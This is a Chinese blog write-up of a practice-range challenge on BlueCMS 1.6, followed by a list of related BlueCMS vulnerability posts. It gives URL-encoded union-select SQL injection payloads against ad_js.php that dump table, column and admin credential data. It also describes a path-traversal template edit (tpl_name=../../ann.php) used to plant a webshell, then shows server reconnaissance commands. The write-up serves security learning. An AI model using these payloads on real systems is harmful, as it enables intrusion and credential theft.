万变不离其宗-掌控者靶场之bluecms1.6漏洞

最新推荐文章于 2024-10-15 09:53:47 发布
最新推荐文章于 2024-10-15 09:53:47 发布
阅读量2.9k 收藏 6
点赞数 5
分类专栏: 渗透笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainsoftware/article/details/119116430
版权

拿到题 睁大眼就能看见底下的 bluecms 1.6  百度了一下漏洞位置  学习了PW的姿势

SQL注入位置

http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1

Order by 7 字段长度为7

注入表名payload:

ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()

注入字段payload:

ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626c75655f61646d696e

这里出了个问题 如下图:   blue_admin  被包住了 使用反引号 是绕不过去的  解决办法是字符串转16进制来解决

注入账户密码payload:

ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(admin_name,0x3a,pwd)%20from%20blue_admin

这里注入的结果是要用查看源代码的方式:(目前没搞懂为什么有些地方要查看源代码才能看报错回显)

cmd5解密后答案为   123abcufo  怀疑是有人故意改的 不然掌控也太坑了 搞这个密码,浪费我一块钱!!

后台拿shell

进入后台 检查了一下 发现有fck的上传组件  这块是漏洞的 不过要本地构造 我记得 没测试哈。。

系统设置里面看见了一个  数据库备份 和模板管理 

记得之前研究dedecms的时候 有用模板来改写shell和 aspcms的提权也可以用到模板来写  

Sql备份这块之前有记得 搞什么系统的时候 备份可以改名 然后直接拿shell

一些时间尝试后,  模板存在 跨目录访问权限 ,当然也靠网上给的一些姿势 自己只是觉得这块可能出发问题 但是没他们说的这么猛

点击右键ann.htm的编辑 新建一个链接出来,

http://59.63.200.79:8003/bluecms/uploads/admin/tpl_manage.php?act=edit&tpl_name=ann.htm

看见语句 tpl_name=ann.htm   这里构造 ../../ann.php

可直接写入,访问地址为 根目录的 ann.php  (关于这个思路 我认为是肯定要本地部署才能猜出来的 毕竟我能想到跨目录改写,肯定猜不出 ann.htm所对应调用的文件名是什么。。 PS:测试了创建了一个不存在的文件名,以为可以直接强制写入新文件,测试下来发现是不行的!)

写入连接蚂剑

shell提权服务器

Phptudy 就是猛,永远的跨目录,永远的高权限. 要是换个宝塔,我现在能力还真没办法想着去K服务器了

没啥技术性说法,也没啥姿势可谈,小三句 直接插入完成。

看看服务器端口号是多少

给出查看语句  

Tasklist -svc

Netstat -ano

END.....

BlueCMS v1.6 sp1 /admin/tpl_manage.php 本地文件包含漏洞分析
foolisheddy
07-11 1742
BlueCMS v1.6 sp1 /admin/tpl_manage.php 本地文件包含漏洞 BlueCMS v1.6 sp1 /admin/tpl_manage.php 本地文件包含漏洞 熟悉功能: 用户可控变量: $_GET[‘tpl_name’] $_POST变量 编写pocsuite插件: 总结: 熟悉功能: 方便管理员对模板html文件进行修改 ...
bluecms1.6 代码审计【失败的一次】
ximo的博客
04-19 372
前言 正处于hvv阶段,但是因为学校原因,并没有参加这次hvv。好在,跟着各位师傅们的努力成果,也做了一些1day,也提交了一些src(希望能过)。 接下来开启新的学习之路—代码审计。 主要目的:加强阅读代码的能力。(主要是跟着师傅们学0.0) 环境 Windows xp(win 7 有点问题) phpstudy bluecms 1.6 开始 ...
BlueCMS_v1.6漏洞挖掘——GetShell
渗透测试
09-15 1783
BlueCMS_v1.6漏洞挖掘——GetShell 渗透思路: 1. 进入网站 2. 扫描后台 3. 百度blueCMS相关漏洞(最好是后台) 4. 进入后台 5. 查看是否有上传文件入口 6. 上传一句话木马(如果有类型防护,可以转图片木马) 7. 查看是否有文件包含漏洞 8. 修改指定文件,把木马写进去 9. 菜刀getshell 视频链接 BlueCMSv1.6漏洞GetShell
VulnCMS靶场
qhk7686的博客
09-29 281
使用sudo /bin/journalctl,如果直接运行/bin/journalctl,只能进入到当前权限。sudo -l 查看提权程序,使用file查看文件类型,EIE是执行程序。发现除web自带的wordpress外,还有一个joomla。8081也有点作用,点不多,能得到一个用户,这我就不演示了。通过dirsearch,扫描到了特殊文件/目录。然后跟下面一样,登录mysql查看用户密码。ok,直接经行登录,但被rbash给限制了。得到了tyrell用户的密码,直接进入。
BlueCms v1.6 本地文件包含漏洞代码审计
内心不种满鲜花就会长满杂草
09-15 5516
目录 BlueCms POC构造 漏洞利用 BlueCms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 POC构造 可以先用代码审计工具如Seay扫一波,或者直接观察代码。如下在user.php中,可以看到,如果act参数为pay值,这包含 'include/payment/'.$_POST['pay']."/index.php" 文件,其中pay参数没有过滤。按道理只要截断一下,
Blue CMS1.6 SQL注入漏洞
whatiwhere的博客
11-30 3039
实验环境 实验环境 操作机系统:Windows XP 目标网站:172.16.11.2 实验目的 了解本次漏洞形成的原理 掌握此漏洞的利用方法 学会如何去修复此漏洞 实验工具 1.php :本次实验的Payload 实验内容 BlueCMS 是一款国产的CMS平台,十分灵活、方便,早些年广泛的应用于商业系统、个人博客等。 漏洞介绍 程序在使用getip()函数获取客户端ip时没有严格...
BlueCMS 1.6漏洞复现CVE-2024-45894任意删除文件漏洞+SQL注入
m0_74321564的博客
10-12 455
BlueCMS 1.6漏洞复现CVE-2024-45894任意删除文件,需下载phpstudy,启动nignx和mysql服务。在注入时,大部分的注入语句都是在while后面的一个变量,通过跟踪那个变量值来注入。如果$_GET['ad_id']存在且非空,则使用trim()函数去除ad_id字符串两侧的空白字符,然后将结果赋值给$ ad_id。getone不是php的官方函数,那就是自定义函数,其功能应该是执行后面的SQL语句并将其值赋值给$ad,疑似有sql注入。以上漏洞属于CVE-2024-45894。
PHP地方门户系统-BlueCMS v1.6 sp1.rar
07-07
bluecms v1.6 升级到 bluecms v1.6 sp1版说明: 解决问题: 1.修正所有已知错误 2.前后台整合通用编辑器fckeditor,替换之前的editor 3.增加前台发布新闻过滤 4.增加禁止词语过滤 5.增加同一用户注册时间间隔...
bluecms-src靶场安装包
09-10
bluecms-src靶场安装包
Lankecms蓝科中英文双语企业门户V2.0版(伪静态+宽屏LED+模板).rar
03-18
本人在淘宝上购买的蓝科外贸网站源码,正版无漏洞,利用thinkPHP框架,亲测可用,很实用,快速建站。
对一次入门bluecms v1.6的渗透
qq_44925740的博客
12-23 3369
记一次对bluecms v1.6 sp1的渗透测试 文章目录记一次对bluecms v1.6 sp1的渗透测试前言一、复现环境二、seay审计三、进行SQL注入四、后台getshell 前言 本次主要是对此CMS的渗透,没有对代码进行详细审计。运气很好,用seay审计时第一个ad_js.php有sql注入。然后进行验证,确实没有误报。后面的代码也就没有再去看,等菜逼的我代码再有提升再去慢慢研究。 一、复现环境 phpstudy php5.2.17 mysql8.x 二、seay审计 验证一下 数值型注入 发
BlueCMS漏洞靶场学习心得(上)
m0_48294281的博客
01-08 4766
靶场学习心得,欢迎交流!
bluecms6.1版本的ad_js.php处有xss漏洞
weixin_40709439的博客
02-12 342
bluecms6.1版本的ad_js.php处有xss漏洞 adid=!empty(ad_id = !empty(adi​d=!empty(_GET[‘ad_id’]) ? trim(GET[′adid′]):′′;if(empty(_GET['ad_id']) : ''; if(empty(G​ET[′adi​d′]):...
代码审计之SQL注入:BlueCMSv1.6 sp1
weixin_30535843的博客
12-07 352
Preface 这是一篇纪录关于BlueCMSv1.6 sp1两个SQL注入的审计过程,原文来自代码审计之SQL注入:BlueCMSv1.6 sp1,主要纪录一下个人在参考博文复现这两个漏洞经过。 参看视频:BlueCMS 1.6 SQL 注入漏洞 工具及环境 bluecms v2.1 sp1     链接:http://pan.baidu.com/s/1dFKLanR...
代码审计:Bluecms v1.6
GKDf1sh
07-26 1019
漏洞列表如下(共计32个漏洞,附Exp,按时间顺序): 未完待续…Exp:``http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:face_pic3=2.php` 2、ad_js.php 19行处存在sql注入漏洞 Exp: 3、include/common.fun.php->getip()存在ip伪造漏洞 4、user.php 955行处存在任意文件删除漏洞 Exp:``http://127.0.0.3/bluecms/user.php?a
BlueCMS 1.6漏洞复现CVE-2024-45894任意删除文件漏洞+SQL注入(附BlueCMS 1.6安装包)
最新发布
漏洞文库
10-15 627
BlueCMS 1.6漏洞复现CVE-2024-45894任意删除文件漏洞+SQL注入(附BlueCMS 1.6安装包)
bluecms_v_1.6sp1代码审计
RestoreJustice的博客
03-23 911
这是一个比较古老的cms,可以说是满目疮痍,更靶场一样。上述漏洞主要是前台的。后台同样存在类似或者没有写到的漏洞。由于自己技术有限,就到这。
bluecms1.6源码
09-22
bluecms1.6源码是一个开源的内容管理系统的版本。这个版本具有强大的功能和灵活的扩展性。它适用于构建各种类型的网站,从个人博客到企业门户网站都可以使用。该源码提供了一个易于使用的后台管理系统,可以让网站管理员轻松地管理网站的内容和设置。 这个版本的bluecms还包含了一些常见的功能,如文档管理、用户管理、权限控制、评论管理等。它还提供了一个强大的模板系统,可以让用户根据自己的需求自定义网站的外观和布局。另外,该版本还支持多语言功能,可以根据用户的语言偏好自动切换网站的语言。 从技术角度来看,bluecms1.6源码采用了PHP语言开发,并使用MySQL数据库来存储数据。它使用了一些流行的开发框架和库,如CodeIgniter和jQuery,以提高开发效率和用户体验。 由于bluecms1.6是开源的,所以用户可以自由地修改和分发源码。这意味着用户可以根据自己的需要进行定制,并与其他人分享他们的改进。这也使得bluecms1.6成为了一个活跃的社区,用户可以在社区中交流经验和解决问题。 总结来说,bluecms1.6源码是一个功能强大、易于使用且高度可定制的内容管理系统。它适用于各种网站,并具有一个活跃的社区。无论您是个人用户还是企业用户,bluecms1.6都可以满足您的需求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值